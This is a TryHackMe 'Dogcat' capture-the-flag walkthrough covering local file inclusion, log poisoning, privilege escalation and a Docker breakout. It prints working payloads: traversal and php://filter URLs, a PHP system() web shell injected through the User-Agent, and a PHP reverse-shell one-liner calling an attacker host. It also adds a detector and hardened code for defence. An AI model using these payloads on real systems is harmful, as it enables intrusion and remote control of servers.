DogCat – Exploiting LFI and Docker Privilege Escalation – TryHackMe Walkthrough


In this walkthrough, we’ll explore the Dogcat room on TryHackMe, a box that features a Local File Inclusion (LFI) vulnerability and Docker privilege escalation. LFI lets us read sensitive files from the server and eventually gain a shell on it. There are a total of 4 flags on this machine that we need to find.

Let’s Dive in!

Step 1: Scanning the Target

Start by scanning the target machine to find open ports and services:

nmap -sV -p- <target-ip>

The scan reveals the following open ports:

Port 80: HTTP
Port 22: SSH

When you visit the website hosted on port 80, you’ll see a site that shows dog and cat pictures. Time to start web enumeration.

Step 2: Enumerating the Web

As we explore the Dogcat website, you’ll notice that the URL selects the picture through a query parameter, which is a common place to look for file inclusion bugs. Let’s test whether we can exploit a Local File Inclusion (LFI) vulnerability to read sensitive files.

[Screenshot: Dogcat front page]

While testing for Local File Inclusion (LFI) vulnerabilities in the Dogcat room, I noticed that using the ../ directory traversal method only works when the URL contains a “dog” or “cat” keyword.

resulted in “file cannot be opened” errors. However, when I tried this:

?view=dog/../index

it triggered an error:
Fatal error: Cannot redeclare containsStr()

This error occurs because the containsStr() function is declared more than once in the same request: the LFI payload most likely makes index.php include itself, so the function defined in index.php is declared a second time.

After researching, I found that using the php://filter wrapper allows you to bypass this issue. The php://filter wrapper can read a file’s source code without executing it, which prevents the function redeclaration error. By applying this technique, you can safely read the source of index.php and continue exploiting the LFI vulnerability.

[Screenshot: php://filter wrapper request]
<target-IP>/?view=php://filter/convert.base64-encode/resource=dog/../../../../var/www/html/index

This returns the base64-encoded source of index.php, which you can decode locally to read the file.

[Screenshot: decoded index.php source]

The code shows that a second variable, $ext, is appended to the included filename, so to make the LFI work on files other than PHP scripts we also need to control $ext through the URL.
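To make the flaw concrete, here is a Python model (an added example, not the room’s actual PHP source, which is only shown as a screenshot) of the containsStr()-style keyword check and the $ext suffix, next to a hardened version a developer should ship. WEB_ROOT and ALLOWED_VIEWS are assumptions.

```python
import posixpath
from typing import Optional

WEB_ROOT = "/var/www/html"       # assumed document root of the Dogcat web app
ALLOWED_VIEWS = {"dog", "cat"}   # the only two images the page is meant to show


def weak_view_check(view: str) -> bool:
    """Models a containsStr()-style filter: it only asks whether 'dog' or 'cat'
    appears somewhere in the parameter, so traversal after the keyword passes."""
    return "dog" in view or "cat" in view


def weak_include_path(view: str, ext: str = ".php") -> Optional[str]:
    """Path the vulnerable include(view + ext) would open, or None if blocked.
    Stream wrappers such as php://filter are returned unchanged, because PHP
    hands them to the wrapper rather than to the filesystem."""
    if not weak_view_check(view):
        return None
    if "://" in view:
        return view + ext
    return posixpath.normpath(posixpath.join(WEB_ROOT, view + ext))


def safe_include_path(view: str) -> Optional[str]:
    """Hardened version: exact allowlist match, a fixed extension the client
    cannot change, and a resolved-path check as defence in depth."""
    if view not in ALLOWED_VIEWS:
        return None
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, view + ".php"))
    if not resolved.startswith(WEB_ROOT + "/"):
        return None
    return resolved
```

The weak check accepts any string containing a keyword, so the traversal and wrapper payloads from this room pass it, while the allowlist version rejects everything that is not exactly one of the two views.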

[Screenshot: LFI with the ext parameter]

Step 3: LFI (Local File Inclusion) to RCE (Remote Code Execution) – Log Poisoning

It took me some time to fully understand and exploit this vulnerability, but here’s the exact method that worked. A highly useful resource that helped me during this process was RevShells. This website allows you to generate different types of reverse shells easily and also provides options to encode and decode the payloads based on your requirements, making it invaluable for LFI exploitation and other penetration testing tasks.

Log poisoning is an attack in which attacker-controlled input is written into a log file, such as a web server access log or an application log, and that log is then included through a Local File Inclusion (LFI) vulnerability so the injected content is executed as code. Once the poisoned log can be included and executed this way, the attacker has Remote Code Execution (RCE) and can escalate towards full control of the target.

[Screenshot: sending the request through Developer Tools]

I used Developer Tools to test for log poisoning by injecting the string “Hello World” into the User-Agent header. I used the User-Agent header because it is written directly into the access.log file. During the LFI attack, I observed that the string injected into the User-Agent was reflected back, confirming the vulnerability and providing a foothold for further exploitation.

[Screenshot: injected string reflected in the access log]

I tried a reverse shell through the User-Agent, but that didn’t work.
Then I injected this payload into the log:

[Screenshot: PHP system() payload in the User-Agent]
<?php system($_GET['cmd']); ?>

The payload above reads the cmd parameter from the query string and passes it to PHP’s system() function. Once the poisoned log is included through the LFI, whatever is supplied in cmd runs as a system command on the target server, which is why log poisoning is such a common route from LFI to Remote Code Execution (RCE).
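From the defender’s side, the whole chain above leaves a recognisable trail in the access log. The following Python detector is an added example (not part of the original walkthrough) that runs over constructed Apache combined-format lines and flags traversal, php://filter use, inclusion of a log file, PHP tags in the User-Agent, and a command parameter combined with log inclusion. The log path and client addresses in the samples are assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not captured from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:07 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:09 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog/../index HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:12 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [10/Mar/2024:12:00:15 +0000] "GET /?view=dog/..%2f..%2f..%2f..%2fvar/log/apache2/access.log&ext=&cmd=id HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line: str) -> List[str]:
    """Return the indicator names that fire on one log line (empty list if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable"]
    path = unquote(m.group("path")).lower()  # decode ..%2f-style encoding before matching
    hits: List[str] = []
    if "../" in path or "..\\" in path:
        hits.append("traversal")
    if "php://" in path:
        hits.append("php_wrapper")          # php://filter source disclosure
    if "access.log" in path or "error.log" in path:
        hits.append("log_inclusion")        # the LFI is pointed at a web server log
    if re.search(r"<\?(php|=)", m.group("ua"), re.IGNORECASE):
        hits.append("poisoned_user_agent")  # PHP code written into the log via UA
    if "cmd=" in path and "log_inclusion" in hits:
        hits.append("possible_rce")         # poisoned log included with a command parameter
    return hits


def scan(log_text: str) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, indicators) for every suspicious line."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        hits = classify(line)
        if hits:
            findings.append((n, hits))
    return findings
```

Running scan(SAMPLE_LOG) leaves the first benign request alone and reports the remaining four lines, with the last one flagged as possible RCE because a log file is included together with a cmd parameter.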

[Screenshot: flag 1]

This is how I got the first flag.

Step 4: Getting a Reverse Shell

After injecting the system() payload, getting a reverse shell was fairly easy. I URL-encoded this payload to get a reverse shell:

php -r '$sock=fsockopen("attackerIP",attackerport);system("sh <&3 >&3 2>&3");'

Start a netcat listener on your machine:

[Screenshot: netcat listener catching the shell]

You will find Flag 2 one directory up: cd ../ from the web root and look there.

Step 5: Privilege Escalation

The sudo -l command lists the commands the current user is allowed to run with sudo, including any that require no password, which makes it a standard first check when assessing privilege escalation.

sudo -l
[Screenshot: output of sudo -l]
[Screenshot: flag 3]

Step 6: Docker Breakout

The room description mentions that the target runs inside a Docker container:

[Screenshot: Docker environment]

After looking around the system, I found a backup file in /opt.

[Screenshot: launch.sh script]

Upon inspecting the launch.sh file, you’ll notice that a host directory is mounted into the Docker container as a volume, so files written inside the container are visible on the host. This is the key to the breakout. The backup.sh script creates a tar archive of the /root/container directory, which is a critical clue for privilege escalation.

Although running crontab -e inside the container didn’t show anything, it’s likely that the host OS is executing backup.sh on a schedule. Because the script lives on the shared volume, we can append a bash reverse shell to it and have the host run it for us. Before injecting, make sure a Netcat listener is running on your chosen port, ready to catch the reverse shell.

Bash Command used:

[Screenshot: bash command appending the reverse shell to backup.sh]

After inserting the bash payload, this is what the /backup.sh file looked like:

[Screenshot: modified backup.sh]

You will have a reverse shell again but this time to the host machine!

[Screenshot: reverse shell from the host in netcat]

That’s how you will get your 4th flag!